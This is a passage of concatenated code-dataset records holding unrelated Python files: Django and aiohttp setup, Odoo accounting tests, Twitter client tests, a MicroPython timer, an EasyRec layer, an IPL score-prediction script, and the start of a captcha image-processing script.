include(router.urls)),\n]\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"17235468","text":"from machine import Timer\nfrom machine import Pin\ntim = Timer(1, mode=Timer.PERIODIC, width=32)\ntim_a = tim.channel(Timer.A | Timer.B, freq=1) # 1 Hz frequency requires a 32 bit timer\n\nled = Pin(25, Pin.OUT) # enable GP16 as output to drive the LED\n\ndef tick(timer): # we will receive the timer object when being called\n global led\n print(\"toggle led\")\n led.toggle() # toggle the LED\n\ntim_a.irq(handler=tick, trigger=Timer.TIMEOUT) # create the interrupt","sub_path":"timer_irq.py","file_name":"timer_irq.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"354373770","text":"# -*- encoding: utf-8 -*-\n# Copyright (c) Alibaba, Inc. and its affiliates.\nimport tensorflow as tf\nfrom tensorflow.python.keras.layers import Layer\n\nfrom easy_rec.python.layers import multihead_cross_attention\nfrom easy_rec.python.utils.activation import get_activation\nfrom easy_rec.python.utils.shape_utils import get_shape_list\n\n\nclass BST(Layer):\n\n def __init__(self, params, name='bst', l2_reg=None, **kwargs):\n super(BST, self).__init__(name=name, **kwargs)\n self.l2_reg = l2_reg\n self.config = params.get_pb_config()\n\n def encode(self, seq_input, max_position):\n seq_fea = multihead_cross_attention.embedding_postprocessor(\n seq_input,\n position_embedding_name=self.name + '/position_embeddings',\n max_position_embeddings=max_position,\n reuse_position_embedding=tf.AUTO_REUSE)\n\n n = tf.count_nonzero(seq_input, axis=-1)\n seq_mask = tf.cast(n > 0, tf.int32)\n\n attention_mask = multihead_cross_attention.create_attention_mask_from_input_mask(\n from_tensor=seq_fea, to_mask=seq_mask)\n\n hidden_act = get_activation(self.config.hidden_act)\n attention_fea = multihead_cross_attention.transformer_encoder(\n seq_fea,\n hidden_size=self.config.hidden_size,\n num_hidden_layers=self.config.num_hidden_layers,\n num_attention_heads=self.config.num_attention_heads,\n attention_mask=attention_mask,\n intermediate_size=self.config.intermediate_size,\n intermediate_act_fn=hidden_act,\n hidden_dropout_prob=self.config.hidden_dropout_prob,\n attention_probs_dropout_prob=self.config.attention_probs_dropout_prob,\n initializer_range=self.config.initializer_range,\n name=self.name + '/transformer',\n reuse=tf.AUTO_REUSE)\n # attention_fea shape: [batch_size, seq_length, hidden_size]\n out_fea = attention_fea[:, 0, :] # target feature\n print('bst output shape:', out_fea.shape)\n return out_fea\n\n def call(self, inputs, training=None, **kwargs):\n seq_features, target_features = inputs\n assert len(seq_features) > 0, '[%s] sequence feature is empty' % self.name\n if not training:\n self.config.hidden_dropout_prob = 0.0\n self.config.attention_probs_dropout_prob = 0.0\n\n seq_embeds = [seq_fea for seq_fea, _ in seq_features]\n\n max_position = self.config.max_position_embeddings\n # max_seq_len: the max sequence length in current mini-batch, all sequences are padded to this length\n batch_size, max_seq_len, _ = get_shape_list(seq_features[0][0], 3)\n valid_len = tf.assert_less_equal(\n max_seq_len,\n max_position,\n message='sequence length is greater than `max_position_embeddings`:' +\n str(max_position) + ' in feature group:' + self.name)\n with tf.control_dependencies([valid_len]):\n # seq_input: [batch_size, seq_len, embed_size]\n seq_input = tf.concat(seq_embeds, axis=-1)\n if len(target_features) > 0:\n max_position += 1\n\n seq_embed_size = seq_input.shape.as_list()[-1]\n if seq_embed_size != self.config.hidden_size:\n seq_input = tf.layers.dense(\n seq_input,\n self.config.hidden_size,\n activation=tf.nn.relu,\n kernel_regularizer=self.l2_reg)\n\n if len(target_features) > 0:\n target_feature = tf.concat(target_features, axis=-1)\n target_size = target_feature.shape.as_list()[-1]\n assert seq_embed_size == target_size, 'the embedding size of sequence and target item is not equal' \\\n ' in feature group:' + self.name\n if target_size != self.config.hidden_size:\n target_feature = tf.layers.dense(\n target_feature,\n self.config.hidden_size,\n activation=tf.nn.relu,\n kernel_regularizer=self.l2_reg)\n # target_feature: [batch_size, 1, embed_size]\n target_feature = tf.expand_dims(target_feature, 1)\n # seq_input: [batch_size, seq_len+1, embed_size]\n seq_input = tf.concat([target_feature, seq_input], axis=1)\n\n return self.encode(seq_input, max_position)\n","sub_path":"easy_rec/python/layers/keras/bst.py","file_name":"bst.py","file_ext":"py","file_size_in_byte":4065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"400236157","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\nfrom odoo.addons.stock_account.tests.test_anglo_saxon_valuation_reconciliation_common import ValuationReconciliationTestCommon\nfrom odoo.tests.common import Form, tagged\n\n\n@tagged('post_install', '-at_install')\nclass TestValuationReconciliation(ValuationReconciliationTestCommon):\n\n @classmethod\n def setUpClass(cls, chart_template_ref=None):\n super().setUpClass(chart_template_ref=chart_template_ref)\n\n cls.stock_account_product_categ.property_account_creditor_price_difference_categ = cls.company_data['default_account_stock_price_diff']\n\n @classmethod\n def setup_company_data(cls, company_name, chart_template=None, **kwargs):\n company_data = super().setup_company_data(company_name, chart_template=chart_template, **kwargs)\n\n # Create stock config.\n company_data.update({\n 'default_account_stock_price_diff': cls.env['account.account'].create({\n 'name': 'default_account_stock_price_diff',\n 'code': 'STOCKDIFF',\n 'reconcile': True,\n 'user_type_id': cls.env.ref('account.data_account_type_current_assets').id,\n 'company_id': company_data['company'].id,\n }),\n })\n return company_data\n\n def _create_purchase(self, product, date, quantity=1.0, set_tax=False, price_unit=66.0):\n rslt = self.env['purchase.order'].create({\n 'partner_id': self.partner_a.id,\n 'currency_id': self.currency_data['currency'].id,\n 'order_line': [\n (0, 0, {\n 'name': product.name,\n 'product_id': product.id,\n 'product_qty': quantity,\n 'product_uom': product.uom_po_id.id,\n 'price_unit': price_unit,\n 'date_planned': date,\n 'taxes_id': [(6, 0, product.supplier_taxes_id.ids)] if set_tax else False,\n })],\n 'date_order': date,\n })\n rslt.button_confirm()\n return rslt\n\n def _create_invoice_for_po(self, purchase_order, date):\n move_form = Form(self.env['account.move'].with_context(default_move_type='in_invoice', default_date=date))\n move_form.invoice_date = date\n move_form.partner_id = self.partner_a\n move_form.currency_id = self.currency_data['currency']\n move_form.purchase_id = purchase_order\n return move_form.save()\n\n def test_shipment_invoice(self):\n \"\"\" Tests the case into which we receive the goods first, and then make the invoice.\n \"\"\"\n test_product = self.test_product_delivery\n date_po_and_delivery = '2018-01-01'\n\n purchase_order = self._create_purchase(test_product, date_po_and_delivery)\n self._process_pickings(purchase_order.picking_ids, date=date_po_and_delivery)\n\n invoice = self._create_invoice_for_po(purchase_order, '2018-02-02')\n invoice.action_post()\n picking = self.env['stock.picking'].search([('purchase_id','=',purchase_order.id)])\n self.check_reconciliation(invoice, picking)\n # cancel the invoice\n invoice.button_cancel()\n\n def test_invoice_shipment(self):\n \"\"\" Tests the case into which we make the invoice first, and then receive the goods.\n \"\"\"\n # Create a PO and an invoice for it\n test_product = self.test_product_order\n purchase_order = self._create_purchase(test_product, '2017-12-01')\n\n invoice = self._create_invoice_for_po(purchase_order, '2017-12-23')\n move_form = Form(invoice)\n with move_form.invoice_line_ids.edit(0) as line_form:\n line_form.quantity = 1\n invoice = move_form.save()\n\n # Validate the invoice and refund the goods\n invoice.action_post()\n self._process_pickings(purchase_order.picking_ids, date='2017-12-24')\n picking = self.env['stock.picking'].search([('purchase_id', '=', purchase_order.id)])\n self.check_reconciliation(invoice, picking)\n\n # Return the goods and refund the invoice\n stock_return_picking_form = Form(self.env['stock.return.picking']\n .with_context(active_ids=picking.ids, active_id=picking.ids[0],\n active_model='stock.picking'))\n stock_return_picking = stock_return_picking_form.save()\n stock_return_picking.product_return_moves.quantity = 1.0\n stock_return_picking_action = stock_return_picking.create_returns()\n return_pick = self.env['stock.picking'].browse(stock_return_picking_action['res_id'])\n return_pick.action_assign()\n return_pick.move_lines.quantity_done = 1\n return_pick._action_done()\n self._change_pickings_date(return_pick, '2018-01-13')\n\n # Refund the invoice\n refund_invoice_wiz = self.env['account.move.reversal'].with_context(active_model=\"account.move\", active_ids=[invoice.id]).create({\n 'reason': 'test_invoice_shipment_refund',\n 'refund_method': 'cancel',\n 'date': '2018-03-15',\n })\n refund_invoice = self.env['account.move'].browse(refund_invoice_wiz.reverse_moves()['res_id'])\n\n # Check the result\n self.assertEqual(invoice.payment_state, 'reversed', \"Invoice should be in 'reversed' state\")\n self.assertEqual(refund_invoice.payment_state, 'paid', \"Refund should be in 'paid' state\")\n self.check_reconciliation(refund_invoice, return_pick)\n\n def test_multiple_shipments_invoices(self):\n \"\"\" Tests the case into which we receive part of the goods first, then 2 invoices at different rates, and finally the remaining quantities\n \"\"\"\n test_product = self.test_product_delivery\n date_po_and_delivery0 = '2017-01-01'\n purchase_order = self._create_purchase(test_product, date_po_and_delivery0, quantity=5.0)\n self._process_pickings(purchase_order.picking_ids, quantity=2.0, date=date_po_and_delivery0)\n picking = self.env['stock.picking'].search([('purchase_id', '=', purchase_order.id)], order=\"id asc\", limit=1)\n\n invoice = self._create_invoice_for_po(purchase_order, '2017-01-15')\n move_form = Form(invoice)\n with move_form.invoice_line_ids.edit(0) as line_form:\n line_form.quantity = 3.0\n invoice = move_form.save()\n invoice.action_post()\n self.check_reconciliation(invoice, picking, full_reconcile=False)\n\n invoice2 = self._create_invoice_for_po(purchase_order, '2017-02-15')\n move_form = Form(invoice2)\n with move_form.invoice_line_ids.edit(0) as line_form:\n line_form.quantity = 2.0\n invoice2 = move_form.save()\n invoice2.action_post()\n self.check_reconciliation(invoice2, picking, full_reconcile=False)\n\n # We don't need to make the date of processing explicit since the very last rate\n # will be taken\n self._process_pickings(purchase_order.picking_ids.filtered(lambda x: x.state != 'done'), quantity=3.0)\n picking = self.env['stock.picking'].search([('purchase_id', '=', purchase_order.id)], order='id desc', limit=1)\n self.check_reconciliation(invoice2, picking)\n\n def test_rounding_discount(self):\n self.env.ref(\"product.decimal_discount\").digits = 5\n tax_exclude_id = self.env[\"account.tax\"].create(\n {\n \"name\": \"Exclude tax\",\n \"amount\": \"0.00\",\n \"type_tax_use\": \"purchase\",\n }\n )\n\n test_product = self.test_product_delivery\n test_product.supplier_taxes_id = [(6, 0, tax_exclude_id.ids)]\n date_po_and_delivery = '2018-01-01'\n\n purchase_order = self._create_purchase(test_product, date_po_and_delivery, quantity=10000, set_tax=True)\n self._process_pickings(purchase_order.picking_ids, date=date_po_and_delivery)\n\n invoice = self._create_invoice_for_po(purchase_order, '2018-01-01')\n\n # Set a discount\n move_form = Form(invoice)\n with move_form.invoice_line_ids.edit(0) as line_form:\n line_form.discount = 0.92431\n move_form.save()\n\n invoice.action_post()\n\n # Check the price difference amount.\n price_diff_line = invoice.line_ids.filtered(lambda l: l.account_id == self.stock_account_product_categ.property_account_creditor_price_difference_categ)\n self.assertTrue(len(price_diff_line) == 1, \"A price difference line should be created\")\n self.assertAlmostEqual(price_diff_line.price_total, -6100.446)\n\n picking = self.env['stock.picking'].search([('purchase_id','=',purchase_order.id)])\n self.check_reconciliation(invoice, picking)\n\n def test_rounding_price_unit(self):\n self.env.ref(\"product.decimal_price\").digits = 6\n\n test_product = self.test_product_delivery\n date_po_and_delivery = '2018-01-01'\n\n purchase_order = self._create_purchase(test_product, date_po_and_delivery, quantity=1000000, price_unit=0.0005)\n self._process_pickings(purchase_order.picking_ids, date=date_po_and_delivery)\n\n invoice = self._create_invoice_for_po(purchase_order, '2018-01-01')\n\n # Set a discount\n move_form = Form(invoice)\n with move_form.invoice_line_ids.edit(0) as line_form:\n line_form.price_unit = 0.0006\n move_form.save()\n\n invoice.action_post()\n\n # Check the price difference amount. It's expected that price_unit * qty != price_total.\n price_diff_line = invoice.line_ids.filtered(lambda l: l.account_id == self.stock_account_product_categ.property_account_creditor_price_difference_categ)\n self.assertTrue(len(price_diff_line) == 1, \"A price difference line should be created\")\n self.assertAlmostEqual(price_diff_line.price_unit, 0.0001)\n self.assertAlmostEqual(price_diff_line.price_total, 100.0)\n\n picking = self.env['stock.picking'].search([('purchase_id','=',purchase_order.id)])\n self.check_reconciliation(invoice, picking)\n","sub_path":"addons/purchase_stock/tests/test_anglo_saxon_valuation_reconciliation.py","file_name":"test_anglo_saxon_valuation_reconciliation.py","file_ext":"py","file_size_in_byte":10086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"57419067","text":"import argparse\nimport serial\nimport serial.tools.list_ports\nfrom utils.message_parse import Parser, Message, MessageType\nfrom loguru import logger\nfrom utils import string_formatter as fmt\nimport struct\nimport os\nimport datetime\nimport jsonlines\n\n\ndef main():\n parser = argparse.ArgumentParser(\"Collects data from the Arduino via serial port connection\")\n parser.add_argument(\"-o\", \"--output\", default=\"output\")\n\n args = parser.parse_args()\n\n port = serial.Serial(port=\"/dev/cu.usbserial-DN01JH39\",\n baudrate=9600,\n timeout=0.2)\n parser = Parser()\n\n os.makedirs(args.output, exist_ok=True)\n output_file = os.path.join(args.output, \"arduino_feed_{}.jsonl\".format(datetime.datetime.now()))\n\n with jsonlines.open(output_file, \"w\", flush=True) as f:\n while True:\n byte_data = port.read()\n\n parser.add_bytes(byte_data)\n msg = parser.next_message()\n\n if msg is not None:\n measurement = struct.unpack(\"f\", fmt.bytes_from_list(msg.data))[0]\n msg_type = MessageType.to_string(msg.msg_type)\n logger.info(\"Type: {}, Data: {}\".format(msg_type,\n measurement))\n f.write({\n msg_type: measurement\n })\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"gui_and_analytics/analytics/active_listener.py","file_name":"active_listener.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"530682609","text":"from typing import Dict, Mapping, Optional\nfrom uuid import UUID\n\nfrom aiohttp.test_utils import AioHTTPTestCase\nfrom aiohttp.web_app import Application\nfrom sqlalchemy import desc, select\n\nfrom aiohttp_rest_framework.db.sa import SAManager\nfrom aiohttp_rest_framework.settings import get_global_config\nfrom tests.functional.sa.orm.utils import create_data_fixtures\nfrom tests.functional.sa.utils import create_tables, drop_tables\nfrom tests.test_app.sa.orm.app import create_application\nfrom tests.test_app.sa.orm.config import DB_URL\nfrom tests.test_app.sa.orm.models import SAField, User, meta\nfrom tests.utils import async_session\n\n\nclass BaseTestCase(AioHTTPTestCase):\n rest_config: Optional[Mapping] = None\n\n async def get_application(self) -> Application:\n return create_application(DB_URL, self.rest_config)\n\n async def setUpAsync(self) -> None:\n await drop_tables(meta, DB_URL)\n await create_tables(meta, DB_URL)\n await create_data_fixtures(DB_URL)\n self.user = await self.get_test_user()\n self.sa_instance = await self.get_sa_instance()\n\n async def tearDownAsync(self) -> None:\n await drop_tables(meta, DB_URL)\n\n async def get_test_user(self) -> User:\n async with async_session(DB_URL) as session:\n query = select(User).limit(1)\n result = await session.execute(query)\n user = result.scalars().one()\n return user\n\n async def get_sa_instance(self) -> SAField:\n async with async_session(DB_URL) as session:\n query = select(SAField).limit(1)\n result = await session.execute(query)\n inst = result.scalars().one()\n return inst\n\n async def get_last_created_user(self) -> User:\n async with async_session(DB_URL) as session:\n query = select(User).order_by(desc(User.created_at))\n result = await session.execute(query)\n user = result.scalars().first()\n return user\n\n async def get_user_by_id(self, user_id: UUID) -> User:\n async with async_session(DB_URL) as session:\n query = select(User).where(User.id == user_id)\n result = await session.execute(query)\n user = result.scalars().first()\n return user\n\n def get_test_user_data(self) -> Dict[str, str]:\n return {\n \"name\": \"Test User\",\n \"email\": \"test@test.com\",\n \"phone\": \"+123456789\",\n \"password\": \"test_pwd\"\n }\n\n async def get_db_manager(self, model) -> SAManager:\n return SAManager(get_global_config(), model)\n","sub_path":"tests/functional/sa/orm/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"510794555","text":"from setuptools import Command\nimport shutil, fnmatch, os\n\nclass CleanCommand(Command):\n\n description = \"REMOVE ALL THE DAMN JUNK\"\n\n buildFiles = [\n 'target',\n 'build',\n 'dist',\n 'deb_dist',\n 'psistats.egg-info',\n '.eggs'\n ]\n\n testFiles = [\n 'coverage.xml',\n 'htmlcov',\n '.cache',\n 'tests/__pycache__'\n '.coverage'\n ]\n\n user_options = [\n ('all', 'a', 'Remove all junk'),\n ('build', 'b', 'Remove all build-related junk'),\n ('pyc', 'p', 'Remove all compiled python junk'),\n ('tests', 't', 'Remove all test/coverage junk')\n ]\n\n boolean_options = ['all','build','pyc','tests']\n\n def initialize_options(self):\n self.all = False\n self.build = False\n self.pyc = False\n self.tests = False\n\n def finalize_options(self):\n pass\n\n def _remove_files(self, files):\n for fn in files:\n print('CLEANING JUNK: %s' % fn)\n\n try:\n if os.path.isfile(fn):\n os.remove(fn)\n else:\n shutil.rmtree(fn)\n except OSError:\n pass\n\n def run(self):\n if self.all or self.tests:\n self._remove_files(self.testFiles)\n\n if self.all or self.build:\n self._remove_files(self.buildFiles)\n\n if self.all or self.pyc:\n for root, dirname, filenames in os.walk('.'):\n for filename in fnmatch.filter(filenames, '*.pyc'):\n pycFile = os.path.join(root, filename)\n print('CLEANING JUNK: %s' % pycFile)\n os.remove(pycFile)\n\n","sub_path":"buildcmds/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"145614299","text":"\"\"\"\n@summary: This is a test module for the twitter api client\n\"\"\"\nimport os\nimport unittest\n\nfrom topicSearch.apiClients.twitterClient import TwitterClient\n\n# .............................................................................\nclass TestInvalidClient(unittest.TestCase):\n \"\"\"\n @summary: These tests fail to set up a client\n \"\"\"\n\n # .............................\n def setUp(self):\n \"\"\"\n @summary: Since the environment may contain valid credentials, we will\n unset them to set up the test\n \"\"\"\n self.consumerKey = os.environ['CONSUMER_KEY']\n self.consumerSecret = os.environ['CONSUMER_SECRET']\n self.accessToken = os.environ['ACCESS_TOKEN']\n self.accessSecret = os.environ['ACCESS_SECRET']\n \n os.environ['CONSUMER_KEY'] = ''\n os.environ['CONSUMER_SECRET'] = ''\n os.environ['ACCESS_TOKEN'] = ''\n os.environ['ACCESS_SECRET'] = ''\n \n # .............................\n def tearDown(self):\n \"\"\"\n @summary: Restore the environment variables\n \"\"\"\n os.environ['CONSUMER_KEY'] = self.consumerKey\n os.environ['CONSUMER_SECRET'] = self.consumerSecret\n os.environ['ACCESS_TOKEN'] = self.accessToken\n os.environ['ACCESS_SECRET'] = self.accessSecret\n\n # .............................\n def test_missingCredentials(self):\n \"\"\"\n @summary: This test checks that the Twitter API client fails properly \n when the environment variables needed for authentication\n are not set.\n \"\"\"\n self.assertRaises(Exception, TwitterClient)\n \n # .............................\n def test_invalidCredentials(self):\n \"\"\"\n @summary: This test checks that the Twitter API client fails properly \n when the credentials provided through the environment \n variables are not valid.\n @note: The status of the query should be 401\n \"\"\"\n os.environ['CONSUMER_KEY'] = 'some invalid value'\n os.environ['CONSUMER_SECRET'] = 'another bad value'\n os.environ['ACCESS_TOKEN'] = 'invalid'\n os.environ['ACCESS_SECRET'] = 'invalid'\n \n tc = TwitterClient()\n self.assertEqual(tc.query('anything').status_code, 401)\n\n# .............................................................................\nclass TestValidClient(unittest.TestCase):\n \"\"\"\n @summary: These tests assume that an instance of the Twitter API client is \n successfully created and can be used to query\n \"\"\"\n # .............................\n def setUp(self):\n \"\"\"\n @summary: These tests assume that a client has been initialized\n \"\"\"\n self.tc = TwitterClient()\n \n # .............................\n def tearDown(self):\n \"\"\"\n @summary: Clean up after test\n \"\"\"\n pass\n \n # .............................\n def test_queryNoGeo(self):\n \"\"\"\n @summary: This test checks that a query works (without a spatial \n component) and that the response looks like what is expected\n \"\"\"\n res = self.tc.query('kabbage')\n # Check that the status code returned is 200\n self.assertEqual(res.status_code, 200)\n \n # .............................\n #def test_geoQuery(self):\n # \"\"\"\n # @summary: This test checks that a query, that uses a location, works \n # correctly and that the response looks how we expect\n # \"\"\"\n # res = self.tc.query('kabbage', useLocation=True)\n # # Check that the status code returned is 200\n # self.assertEqual(res.status_code, 200)\n\n# .............................................................................\nclass TestResponseChange(unittest.TestCase):\n \"\"\"\n @summary: This test checks that an Exception is thrown when the response \n from Twitter appears to have changed.\n \"\"\"\n # .............................\n def setUp(self):\n \"\"\"\n @summary: These tests assume that a client has been initialized\n \"\"\"\n self.tc = TwitterClient()\n \n # .............................\n def test_responseChange(self):\n \"\"\"\n @summary: This test checks that an exception is thrown when all of the\n results have unexpected structure (for example, a property \n could change names)\n \"\"\"\n testResults = [{'newResponse' : 'something new'}]\n \n self.assertRaises(Exception, self.tc.formatResults, testResults)\n \n # .............................\n def test_someResultsChanged(self):\n \"\"\"\n @summary: This test checks that an exception is not raised when only some\n of the results do not have the expected structure. This may\n happen if the view attempts to use a parameter that is not\n always present. This may happen with icons or mentions\n \"\"\"\n testResults = [{u'contributors': None, u'truncated': False, \n u'text': u'The Facts About Factoring https://t.co/JPPZiD9hwu via @KabbageInc', \n u'is_quote_status': False, u'in_reply_to_status_id': None, \n u'id': 646041446768766976, u'favorite_count': 0, \n u'source': u'Twitter Web Client', \n u'retweeted': False, u'coordinates': None, u'entities': {\n u'symbols': [], u'user_mentions': [{u'id': 101787835, \n u'indices': [54, 65], u'id_str': u'101787835', \n u'screen_name': u'KabbageInc', u'name': u'Kabbage'}], \n u'hashtags': [], u'urls': [\n {u'url': u'https://t.co/JPPZiD9hwu', \n u'indices': [26, 49], \n u'expanded_url': u'https://www.kabbage.com/blog/the-facts-about-factoring/', \n u'display_url': u'kabbage.com/blog/the-facts\\u2026'}]}, \n u'in_reply_to_screen_name': None, \n u'in_reply_to_user_id': None, u'retweet_count': 0, \n u'id_str': u'646041446768766976', u'favorited': False, \n u'user': {u'follow_request_sent': False, \n u'has_extended_profile': False, \n u'profile_use_background_image': False, \n u'default_profile_image': False, u'id': 279995855, \n u'profile_background_image_url_https': u'https://abs.twimg.com/images/themes/theme7/bg.gif', \n u'verified': False, u'profile_text_color': u'000000', \n u'profile_image_url_https': u'https://pbs.twimg.com/profile_images/600070995475636228/rhXTa489_normal.jpg', \n u'profile_sidebar_fill_color': u'000000', \n u'entities': {u'url': {u'urls': [{\n u'url': u'http://t.co/LCFvG3JIL9', \n u'indices': [0, 22], \n u'expanded_url': u'http://www.lizalton.com', u'display_url': u'lizalton.com'}]}, \n u'description': {u'urls': []}}, u'followers_count': 21977, \n u'profile_sidebar_border_color': u'000000', \n u'id_str': u'279995855', \n u'profile_background_color': u'000000', \n u'listed_count': 114, \n u'is_translation_enabled': False, \n u'utc_offset': None, u'statuses_count': 249, \n u'description': u'Freelance digital marketing writer. Boston girl. Nerd.', \n u'friends_count': 11231, u'location': u'Boston', \n u'profile_link_color': u'89C9FA', \n u'profile_image_url': u'http://pbs.twimg.com/profile_images/600070995475636228/rhXTa489_normal.jpg', \n u'following': False, u'geo_enabled': False, \n u'profile_banner_url': u'https://pbs.twimg.com/profile_banners/279995855/1431903216', \n u'profile_background_image_url': u'http://abs.twimg.com/images/themes/theme7/bg.gif', \n u'screen_name': u'Beinglizzie', u'lang': u'en', \n u'profile_background_tile': False, \n u'favourites_count': 69, u'name': u'Elizabeth ', \n u'notifications': False, u'url': u'http://t.co/LCFvG3JIL9', \n u'created_at': u'Sun Apr 10 12:26:38 +0000 2011', \n u'contributors_enabled': False, u'time_zone': None, \n u'protected': False, u'default_profile': False, \n u'is_translator': False}, u'geo': None, \n u'in_reply_to_user_id_str': None, \n u'possibly_sensitive': False, u'lang': u'en', \n u'created_at': u'Mon Sep 21 19:20:58 +0000 2015', \n u'in_reply_to_status_id_str': None, u'place': None, \n u'metadata': {u'iso_language_code': u'en', \n u'result_type': u'recent'}},\n {u'badResponse' : 'cannot process this tweet'}]\n self.tc.formatResults(testResults)\n\n# .............................................................................\nif __name__ == \"__main__\":\n unittest.main()\n ","sub_path":"tests/test_apiClients/test_twitter.py","file_name":"test_twitter.py","file_ext":"py","file_size_in_byte":9523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"46933216","text":"from bisect import bisect_right\n\nN = int(input())\ncard = [-1] * N\n\nfor i in range(N):\n c = int(input())\n card[i] = c\n\ndp = [float('inf')]\n\nfor c in card:\n i = bisect_right(dp, c)\n if i >= len(dp):\n dp.append(c)\n else:\n dp[i] = c\n\nans = N - len(dp)\nprint(ans)\n","sub_path":"AtCoder/abc/006d.py","file_name":"006d.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"365164065","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Name :- Prathamesh S. Kumbhar\n# # ML MAJOR PROJECT\n\n# # TASK:\n# \n# # PREDICT THE TOTAL SCORE OF AN IPL MATCH\n# #DATASET:\n# \n# https://drive.google.com/file/d/1ldUmBu7_IF-1B_m5YYM3fejzs1C11OYS/view?usp=sharing\n# \n\n# 1.Handle missing values.
\n# 2.Drop the unnecessary columns.
\n# 3.Convert the categorical string columns to numerical columns, by using one-hot encoding.
\n# 4.Perform feature scaling (if necessary).
\n# 5.Build a model on the “total” column, using a RandomForestRegressor.
\n# 6.Calculate the score.
\n# 7.Predict on a new set of features (you can create a new dataset, having just 1 row, with your preferred feature values).
\n\n# In[ ]:\n\n\nimport pandas as pd\n\n\n# In[ ]:\n\n\ndf = pd.read_csv(\"C:/Users/LIZA MARY MATHEWS/Downloads/ipl2017.csv\")\ndf.head()\n\n\n# # Dropping unneccesary columns\n\n# In[ ]:\n\n\ndf = df.drop(['mid','date'],axis=1)\ndf.head()\n\n\n# In[ ]:\n\n\ndf.describe()\n\n\n# In[ ]:\n\n\n\n\n\n# # Checking unique values\n\n# In[ ]:\n\n\na=df['venue'].unique()\nprint(len(a))\na.sort()\na\n\n\n# In[ ]:\n\n\nb=df['bat_team'].unique()\nprint(b)\nprint(len(b))\n\n\n# In[ ]:\n\n\nc=df['bowl_team'].unique()\nprint(c)\nprint(len(c))\n\n\n# In[ ]:\n\n\ndf = df.replace(\"Rising Pune Supergiants\",\"Rising Pune Supergiant\")\n\n\n# In[ ]:\n\n\nb=df['bat_team'].unique()\nprint(len(b))\nb.sort()\nprint(b)\nc=df['bowl_team'].unique()\nprint(len(c))\nc.sort()\nprint(c)\n\n\n# In[ ]:\n\n\nd=df['batsman'].unique()\nprint(len(d))\nd.sort()\nd\n\n\n# In[ ]:\n\n\ne=df['bowler'].unique()\nprint(len(e))\ne.sort()\ne\n\n\n# In[ ]:\n\n\n\n\n\n# # Handling missing values (if any)\n\n# In[ ]:\n\n\nX = df.drop('total',axis=1)\nprint('Shape of X : ',X.shape)\nprint('Type of X : ',type(X))\n\n\n# In[ ]:\n\n\ny = df['total']\nprint('Shape of y : ',y.shape)\nprint('Type of y : ',type(y))\n\n\n# In[ ]:\n\n\ndf.info()\n\n\n# In[ ]:\n\n\n# No missing values found\n\n\n# # One hot encoding\n\n# In[ ]:\n\n\nX = pd.get_dummies(X,columns=['venue','bat_team','bowl_team','batsman','bowler'])\nX.head()\n\n\n# In[ ]:\n\n\nX.columns\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\nimport matplotlib.pyplot as plt\nplt.hist(df['venue'])\nplt.show()\nplt.hist(df['bat_team'])\nplt.show()\nplt.hist(df['bowl_team'])\nplt.show()\nplt.hist(df['batsman'])\nplt.show()\nplt.hist(df['bowler'])\nplt.show()\nplt.hist(df['runs'])\nplt.show()\nplt.hist(df['wickets'])\nplt.show()\nplt.hist(df['overs'])\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n\n# # Splitting into training and testing sets\n\n# In[ ]:\n\n\nfrom sklearn.model_selection import train_test_split\n\n\n# In[ ]:\n\n\nX_train,X_test,y_train,y_test=train_test_split(X,y,test_size = 0.2,random_state=42)\n\n\n# In[ ]:\n\n\n\n\n\n# # Scaling\n\n# In[ ]:\n\n\nfrom sklearn.preprocessing import StandardScaler\n\n\n# In[ ]:\n\n\nscaler=StandardScaler()\n\n\n# In[ ]:\n\n\nX_train=scaler.fit_transform(X_train)\n\n\n# In[ ]:\n\n\nX_test=scaler.transform(X_test)\n\n\n# In[ ]:\n\n\n\n\n\n# # Random Forest Regressor\n\n# In[ ]:\n\n\nfrom sklearn.ensemble import RandomForestRegressor\n\n\n# In[ ]:\n\n\nmodel=RandomForestRegressor()\n\n\n# In[ ]:\n\n\nmodel.fit(X_train,y_train)\n\n\n# In[ ]:\n\n\nmodel.score(X_test,y_test)\n\n\n# In[ ]:\n\n\nmodel.score(X_train,y_train)\n\n\n# In[ ]:\n\n\n\n\n\n# # Predicting on new dataset\n\n# In[ ]:\n\n\ndf_trial= pd.read_csv('C:/Users/LIZA MARY MATHEWS/Desktop/dataset/ipl_small.csv')\n\n\n# In[ ]:\n\n\ndf_trial.head()\n\n\n# In[ ]:\n\n\nmodel.predict(df_trial)\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"ML MAJOR PROJECT.py","file_name":"ML MAJOR PROJECT.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"303964207","text":"import glob\r\nimport os\r\nimport cv2\r\nimport imutils\r\nimport numpy as np\r\nfrom imutils import contours\r\n\r\ncaptcha_folder = r'D:\\\\captchas\\\\processed_captcha\\\\'\r\nextracted_folder = r'D:\\\\captchas\\\\extracted_chars\\\\'\r\n\r\ncaptcha_images = glob.glob(os.path.join(captcha_folder, 